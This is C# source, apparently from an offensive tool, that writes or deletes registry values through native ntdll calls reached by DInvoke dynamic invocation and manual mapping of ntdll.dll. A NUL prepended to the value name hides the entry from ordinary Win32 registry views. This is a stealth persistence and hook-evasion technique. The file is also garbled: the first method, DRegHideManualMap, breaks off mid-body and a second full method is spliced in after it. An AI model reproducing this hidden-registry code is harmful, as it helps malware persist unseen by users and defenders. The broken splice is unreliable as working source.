 /// <summary>
 /// Calls ntdll!NtOpenKey through DInvoke's generic dynamic invoker (the export is resolved at
 /// call time from "ntdll.dll" rather than through a static P/Invoke declaration).
 /// </summary>
 /// <param name="keyHandle">Receives the opened key handle; only meaningful when the returned status is Success.</param>
 /// <param name="desiredAccess">Access mask requested on the key.</param>
 /// <param name="objectAttributes">OBJECT_ATTRIBUTES describing the key (native object path and attributes).</param>
 /// <returns>The NTSTATUS value NtOpenKey returned.</returns>
 public static DInvoke.Data.Native.NTSTATUS NtOpenKey(
     ref IntPtr keyHandle,
     STRUCTS.ACCESS_MASK desiredAccess,
     ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes)
 {
     // The dynamic invoker takes boxed arguments; by-ref/out results must be read back from the array.
     object[] boxedArgs = new object[] { keyHandle, desiredAccess, objectAttributes };
     object rawStatus = DInvoke.DynamicInvoke.Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtOpenKey", typeof(DELEGATES.NtOpenKey), ref boxedArgs);
     // First slot is the handle NtOpenKey wrote through its out parameter.
     keyHandle = (IntPtr)boxedArgs[0];
     return (DInvoke.Data.Native.NTSTATUS)rawStatus;
 }
        public static void DRegHideManualMap(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false)
        {
            DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = new DInvoke.Data.PE.PE_MANUAL_MAP();
            mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll");

            try
            {
                if (hive == "HKLM")
                {
                    hive = @"\Registry\Machine";
                }
                else if (hive == "HKCU")
                {
                    String sid = WindowsIdentity.GetCurrent().User.ToString();
                    hive = @"\Registry\User\" + sid;
                }
                else
                {
                    throw new Exception("Hive needs to be either HKLM or HKCU");
                }
                if (hiddenKey)
                {
                    keyName = "\0" + keyName;
                }
                String regKey    = hive + subKey;
                IntPtr keyHandle = IntPtr.Zero;
                STRUCTS.OBJECT_ATTRIBUTES          oa        = new STRUCTS.OBJECT_ATTRIBUTES();
                DInvoke.Data.Native.UNICODE_STRING UC_RegKey = new DInvoke.Data.Native.UNICODE_STRING();
                string SID = WindowsIdentity.GetCurrent().User.ToString();
                DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKey, regKey);
                IntPtr oaObjectName = Marshal.AllocHGlobal(Marshal.SizeOf(UC_RegKey));
                Marshal.StructureToPtr(UC_RegKey, oaObjectName, true);
                oa.Length                   = Marshal.SizeOf(oa);
                oa.Attributes               = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE;
                oa.objectName               = oaObjectName;
                oa.SecurityDescriptor       = IntPtr.Zero;
                oa.SecurityQualityOfService = IntPtr.Zero;
                DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS();

                ref IntPtr                    rkeyHandle    = ref keyHandle;
                STRUCTS.ACCESS_MASK           desiredAccess = STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS;
                ref STRUCTS.OBJECT_ATTRIBUTES roa           = ref oa;
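        /// <summary>
        /// Sets (or deletes) a REG_SZ value under <paramref name="hive"/> + <paramref name="subKey"/> using the
        /// native ntdll registry calls (NtOpenKey / NtSetValueKey / NtDeleteValueKey) via TinyDinvoke.
        /// </summary>
        /// <param name="hive">"HKLM" (mapped to \Registry\Machine) or "HKCU" (mapped to \Registry\User\&lt;current user SID&gt;).
        /// Comparison is ordinal and case-sensitive; anything else is reported as an error.</param>
        /// <param name="subKey">Key path below the hive, appended verbatim (so it must start with a backslash).</param>
        /// <param name="keyName">Name of the value to set or delete.</param>
        /// <param name="keyValue">String data written as REG_SZ when <paramref name="deleteKey"/> is false.</param>
        /// <param name="hiddenKey">When true, a NUL character is prepended to the value name and the UNICODE_STRING
        /// length is set explicitly so the NUL is part of the name (RtlInitUnicodeString would stop at it).
        /// Presumably this is what keeps the value out of NUL-terminated Win32-level views — not verified here.</param>
        /// <param name="deleteKey">When true the value is deleted instead of written.</param>
        /// <remarks>
        /// Never throws to the caller: every exception is caught and its message written to the console.
        /// All native buffers and the key handle are released in a finally block, on failure paths as well.
        /// </remarks>
        public static void DRegHide(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false)
        {
            IntPtr keyHandle       = IntPtr.Zero; // closed with NtClose when non-zero
            IntPtr objectNamePtr   = IntPtr.Zero; // HGlobal copy of the key path UNICODE_STRING referenced by OBJECT_ATTRIBUTES
            IntPtr keyPathBuffer   = IntPtr.Zero; // CoTaskMem text buffers owned by this method
            IntPtr valueNameBuffer = IntPtr.Zero;
            IntPtr valueDataBuffer = IntPtr.Zero;
            try
            {
                String nativeHive;
                switch (hive)
                {
                    case "HKLM":
                        nativeHive = @"\Registry\Machine";
                        break;
                    case "HKCU":
                        nativeHive = @"\Registry\User\" + WindowsIdentity.GetCurrent().User.ToString();
                        break;
                    default:
                        // Caught below and reported; the message is preserved from the original implementation.
                        throw new ArgumentException("Hive needs to be either HKLM or HKCU");
                }

                // Leading NUL marks the value as "hidden"; MakeUnicodeString keeps it because the length
                // is derived from the managed string rather than from a NUL scan.
                String valueName = hiddenKey ? "\0" + keyName : keyName;

                // Every string travels in a buffer this method owns, so no UNICODE_STRING points at
                // memory whose lifetime is controlled by a marshalling wrapper.
                DInvoke.Data.Native.UNICODE_STRING ucRegKey = MakeUnicodeString(nativeHive + subKey, out keyPathBuffer);
                objectNamePtr = Marshal.AllocHGlobal(Marshal.SizeOf(ucRegKey));
                // fDeleteOld must be false: the memory is freshly allocated and holds no previous structure.
                Marshal.StructureToPtr(ucRegKey, objectNamePtr, false);

                STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES();
                oa.Length                   = Marshal.SizeOf(oa);
                oa.Attributes               = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE;
                oa.objectName               = objectNamePtr;
                oa.SecurityDescriptor       = IntPtr.Zero;
                oa.SecurityQualityOfService = IntPtr.Zero;

                // NOTE(review): KEY_SET_VALUE is all NtSetValueKey/NtDeleteValueKey need; KEY_ALL_ACCESS is kept
                // so existing callers see the same open semantics. Requesting less would follow least privilege.
                DInvoke.Data.Native.NTSTATUS status = TinyDinvoke.NtOpenKey(ref keyHandle, STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS, ref oa);
                if (status != DInvoke.Data.Native.NTSTATUS.Success)
                {
                    // Any failure lands here (access denied, bad path, ...), so the status is shown, not just "not found".
                    Console.WriteLine("Regkey not found (NtOpenKey returned " + status + ")");
                    return;
                }
                Console.WriteLine("Handle to " + nativeHive + " succesfully opened!");

                DInvoke.Data.Native.UNICODE_STRING ucValueName = MakeUnicodeString(valueName, out valueNameBuffer);
                if (deleteKey)
                {
                    status = TinyDinvoke.NtDeleteValueKey(keyHandle, ref ucValueName);
                    Console.WriteLine("key deletion status: " + status);
                }
                else
                {
                    DInvoke.Data.Native.UNICODE_STRING ucValueData = MakeUnicodeString(keyValue, out valueDataBuffer);
                    // REG_SZ data is a NUL-terminated string: MaximumLength covers the terminator that
                    // StringToCoTaskMemUni appended, Length alone would store the characters without it.
                    status = TinyDinvoke.NtSetValueKey(keyHandle, ref ucValueName, 0, STRUCTS.REGISTRY_TYPES.REG_SZ, ucValueData.Buffer, ucValueData.MaximumLength);
                    if (status == DInvoke.Data.Native.NTSTATUS.Success)
                    {
                        Console.WriteLine("RegKey successfully set");
                    }
                    else
                    {
                        Console.WriteLine("NtSetValueKey failed with status " + status);
                    }
                }
            }
            catch (Exception e)
            {
                // Best-effort tool behaviour: report and return rather than propagate.
                Console.WriteLine(e.Message);
            }
            finally
            {
                if (keyHandle != IntPtr.Zero)
                {
                    TinyDinvoke.NtClose(keyHandle);
                }
                if (objectNamePtr != IntPtr.Zero)
                {
                    Marshal.FreeHGlobal(objectNamePtr);
                }
                if (keyPathBuffer != IntPtr.Zero)
                {
                    Marshal.FreeCoTaskMem(keyPathBuffer);
                }
                if (valueNameBuffer != IntPtr.Zero)
                {
                    Marshal.FreeCoTaskMem(valueNameBuffer);
                }
                if (valueDataBuffer != IntPtr.Zero)
                {
                    Marshal.FreeCoTaskMem(valueDataBuffer);
                }
            }
        }

        /// <summary>
        /// Builds a UNICODE_STRING over a CoTaskMem copy of <paramref name="text"/> that the caller owns
        /// and must release with Marshal.FreeCoTaskMem. Length is computed from the managed string, so
        /// embedded NUL characters are preserved; MaximumLength includes the terminator the copy carries.
        /// </summary>
        /// <param name="text">Managed string to copy; may contain NUL characters.</param>
        /// <param name="buffer">Receives the native buffer address.</param>
        /// <returns>A UNICODE_STRING whose Buffer is <paramref name="buffer"/>.</returns>
        /// <exception cref="ArgumentException">The string does not fit the 16-bit byte length of a UNICODE_STRING.</exception>
        private static DInvoke.Data.Native.UNICODE_STRING MakeUnicodeString(String text, out IntPtr buffer)
        {
            // Length fields are USHORT byte counts; (chars + terminator) * 2 must fit.
            if ((text.Length + 1) * 2 > ushort.MaxValue)
            {
                throw new ArgumentException("String is too long for a UNICODE_STRING");
            }
            buffer = Marshal.StringToCoTaskMemUni(text);
            DInvoke.Data.Native.UNICODE_STRING us = new DInvoke.Data.Native.UNICODE_STRING();
            us.Length        = (ushort)(text.Length * 2);
            us.MaximumLength = (ushort)((text.Length + 1) * 2);
            us.Buffer        = buffer;
            return us;
        }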